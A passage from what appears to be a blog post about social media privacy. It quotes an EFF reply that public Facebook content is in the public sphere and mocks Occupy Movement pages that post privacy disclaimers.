profile is private and cannot be used by law enforcement, blah, blah,
blah.  This again has no real basis other than I am trying to better
understand how the public/private issues play out on social media
websites when the user neglects privacy settings and opens the profile
up to the public.

Clarification on the second question would simply be awesome and help me
better educate others.

The response from the EFF was:

You are correct, any sort of public information on Facebook is in the public sphere.

Clearly, if you are an "Occupy Movement" organizer, or one of their Facebook admins, remove this statement. It only makes you and your movement look ignorant, and what good is that doing for your so-called cause...
